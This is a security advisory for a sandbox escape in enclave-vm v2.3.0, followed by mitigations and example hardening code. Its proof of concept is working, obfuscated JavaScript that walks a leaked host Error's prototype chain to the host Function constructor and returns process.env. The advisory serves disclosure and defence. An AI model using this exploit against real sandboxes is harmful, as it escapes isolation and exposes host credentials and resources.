GHSA-7qm7-455j-5p63: enclave-vm Vulnerable to Sandbox Escape via Host Error Prototype Chain

Description

A critical sandbox escape vulnerability exists in enclave-vm v2.3.0 that allows untrusted, sandboxed JavaScript code to execute arbitrary code in the host Node.js runtime.

When a tool invocation fails, enclave-vm exposes a host-side Error object to sandboxed code. This Error object retains its host realm prototype chain, which can be traversed to reach the host Function constructor.

An attacker can intentionally trigger a host error (for example, by invoking a non-existent tool), then climb the prototype chain:

Error instance → Error.prototype → Error constructor → Function constructor

Using the host Function constructor, arbitrary JavaScript can be compiled and executed in the host context, fully bypassing the sandbox and granting access to sensitive resources such as process.env, filesystem, and network.

This breaks enclave-vm’s core security guarantee of isolating untrusted code.


Proof of Concept

// Vector 35: The Host Error Escape
// Purpose: Trigger a Host-side error and traverse its prototype chain
// to reach the Host Function constructor.

const s = (...args) => String.fromCharCode(...args);

const kCon    = s(99,111,110,115,116,114,117,99,116,111,114); // "constructor"
const kProto  = s(95,95,112,114,111,116,111,95,95);           // "__proto__"
const kLookup = s(95,95,108,111,111,107,117,112,71,101,116,116,101,114,95,95); // "__lookupGetter__"
const kCode   = s(114,101,116,117,114,110,32,112,114,111,99,101,115,115,46,101,110,118); // "return process.env"
const kPtype  = s(112,114,111,116,111,116,121,112,101); // "prototype"

try {
    const ObjectProto = Object[kPtype];
    const lookup = ObjectProto[kLookup];
    const getProtoNative = lookup.call(ObjectProto, kProto);

    let hostError;
    try {
        await callTool('THIS_TOOL_DOES_NOT_EXIST_XYZ', {});
    } catch (e) {
        hostError = e;
    }

    const errProto = getProtoNative.call(hostError);
    const ErrorCtor = errProto[kCon];
    const HostFunc = ErrorCtor[kCon];

    const exploitFn = HostFunc(kCode);
    return exploitFn();
} catch (e) {
    return e.message;
}

Mitigation

  • Ensure all Error objects crossing the sandbox boundary are re-created inside the sandbox realm
  • Strip or freeze prototype chains of host objects
  • Prevent access to host Function constructors
  • Harden tool error handling to avoid leaking host-native objects
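
The first and last mitigation items, as an added example (not enclave-vm's own code or its actual fix): the host reduces a thrown error to primitive strings and a factory compiled in the sandbox realm rebuilds it. `node:vm` stands in for the sandbox realm as an assumption, and `makeErrorFactory`, `toSandboxError`, `realmOf`, `hostCallTool` and `demo` are hypothetical names.

```javascript
const vm = require('node:vm');

// Error names allowed across the boundary; anything else becomes "Error".
const SAFE_NAMES = new Set(['Error', 'TypeError', 'RangeError']);

// Compile the factory inside the sandbox context, before untrusted code runs,
// so the captured `Error` is the sandbox realm's own constructor.
function makeErrorFactory(context) {
  return vm.runInContext(`(function () {
    const SandboxError = Error;
    return function (name, message) {
      const e = new SandboxError(message);
      e.name = name;
      e.stack = name + ': ' + message; // drop frames that name host files
      return e;
    };
  })()`, context);
}

// Host side: reduce whatever was thrown to two primitive strings, then let
// the sandbox realm build the object that sandboxed code receives.
function toSandboxError(factory, thrown) {
  const isErr = thrown instanceof Error;
  const name = isErr && SAFE_NAMES.has(thrown.name) ? thrown.name : 'Error';
  const message = String(isErr ? thrown.message : thrown).slice(0, 200);
  return factory(name, message);
}

// Regression check: which realm does an error object belong to?
function realmOf(context, err) {
  const sandboxProto = vm.runInContext('Error.prototype', context);
  if (Object.prototype.isPrototypeOf.call(sandboxProto, err)) return 'sandbox';
  return err instanceof Error ? 'host' : 'unknown';
}

// Constructed stand-in for a failing tool call (hypothetical dispatcher).
function hostCallTool(name) {
  throw new TypeError('Unknown tool: ' + name);
}
function demo() {
  const context = vm.createContext({});
  const factory = makeErrorFactory(context);
  try {
    hostCallTool('missing_tool');
  } catch (hostErr) {
    const safe = toSandboxError(factory, hostErr);
    return { before: realmOf(context, hostErr), after: realmOf(context, safe), safe };
  }
}
```

`node:vm` is used here only to obtain a second realm; Node's documentation states that it is not a security mechanism. A `realmOf`-style assertion on every value handed to sandboxed code makes a useful regression test for this class of leak.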
